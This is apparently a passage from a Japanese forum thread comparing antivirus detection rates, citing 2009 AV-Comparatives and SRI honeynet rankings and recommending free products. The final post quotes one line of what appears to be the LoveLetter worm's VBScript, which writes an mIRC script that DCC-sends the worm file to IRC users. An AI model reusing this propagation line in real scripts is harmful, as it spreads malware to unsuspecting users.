51 : AV-Comparatives 2009年8月 オンデマンド検出力テスト ttp://www.av-comparatives.org/images/stories/test/ondret/avc_report23.pdf ■Advanced+ ★★★ G DATA 20.0 99.8% (9fp) (fp=false positive) Symantec Norton 17.0 98.4% (13fp) avast! Pro 4.8 98.0% (5fp) F-Secure 10.00 97.9% (4fp) BitDefender 13.0 97.8% (4fp) eScan 10.0 97.7% (4fp) ESET NOD32 4.0 97.2% (12fp) ---------------------------------------------------------------- ■Advanced ★★ AVIRA Premium 9.0 99.4% (21fp) McAfee VirusScan Plus 13.11 98.7% (41fp) TrustPort 2.8 97.6% (42fp) AVG 8.5 94.0% (8fp) Kaspersky 9.0 94.7% (8fp) ---------------------------------------------------------------- ■STANDARD ★ Microsoft Live OneCare 2.5 90.0% (5fp) ---------------------------------------------------------------- ■TESTED Sophos 7.6 91.3% (26fp) Kingsoft 2009.08 86.4% (47fp) Norman 7.10 84.8% (42fp)
52 : Most Effective Antivirus Tools Against New Malware Binaries ttp://mtc.sri.com/live_data/av_rankings/ Rank Detects Missed Product (2009年11月24日) 1st 90% 137 Ikarus 2nd 89% 147 AVG ttp://www.avg.co.jp/free/download.html?prd=afe#tba2 3rd 89% 150 AntiVir ttp://www.free-av.com/en/download/index.html 4th 89% 153 Microsoft ttp://www.microsoft.com/security_essentials/default.aspx?mkt=ja-jp 5th 88% 164 DrWeb 6th 87% 171 BitDefender ttp://www.bitdefender.com/media/html/trialpay.html 7th 87% 171 Kaspersky 8th 87% 173 F-Prot 9th 87% 180 Sophos 10th 87% 180 Authentium 11th 85% 203 F-Secure 12th 84% 222 Norman 13th 83% 236 GData 14th 82% 244 CAT-QuickHeal 15th 82% 250 Avast ttp://www.avast.com/jpn/avast_4_home.html 16th 81% 253 VBA32 17th 81% 253 VirusBuster 18th 81% 257 eTrust-Vet 19th 81% 264 AhnLab-V3 20th 80% 266 TrendMicro 21st 80% 266 Fortinet ttp://www.forticlient.com/standard.html 22nd 80% 270 Symantec 23rd 80% 277 Rising ttp://www.freerav.com 24th 78% 300 ClamAV ttp://www.clamwin.com ttp://www.moonsecure.com ttp://www.clamxav.com 25th 78% 302 McAfee 26th 77% 311 TheHacker 27th 75% 339 Panda ttp://www.cloudantivirus.jp │ 30th 7l 1291 NOD32v2 (*´○`)ノ゙[1390 malware]
53 : ttp://mtc.sri.com/live_data/av_rankings/ > DISCLAIMERS - PLEASE READ BEFORE REVIEWING RESULTS: > > 1. All antivirus binary ysis results are provided via www.virustotal.com. > > 2. Each binary is submitted for evaluation within 24hrs of our harvesting it live > from the Internet. Each antivirus tool is only given this one attempt to detect the binary. > Our intention is to evaluate how the antivirus tools are performing against > the latest malware on the Internet, at least from the narrow vantage point of our honeynet. > > 3. Please be aware that most antivirus vendors WILL be able to detect > the malware binaries listed in the missed set, usually within a few days. > Therefore you should not view an antivirus tool's missed binaries list > as a reflection of its current detection coverage. Rather, it is only a list of binaries > that were missed at the time of our evaluation. > > 4. Our detection rates represent the TRUE POSITIVE detection rates. > The results do not take into consideration the false positive rate of a given tool, > and thus a tool that declares everything to be infected would appear to have > the highest true positive percentage rate.
54 : >>716 Σ(・ω・) お勧めはavast!ですか?! そちらの方が良いかもです〜ただ結構2ちゃんでも過剰反応のレス何度か見たのでw でも、良いみたいですね!へなさんがフリーでも安心するならどちらでも
55 : 誤爆ごめん
56 :11/01/09 Scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
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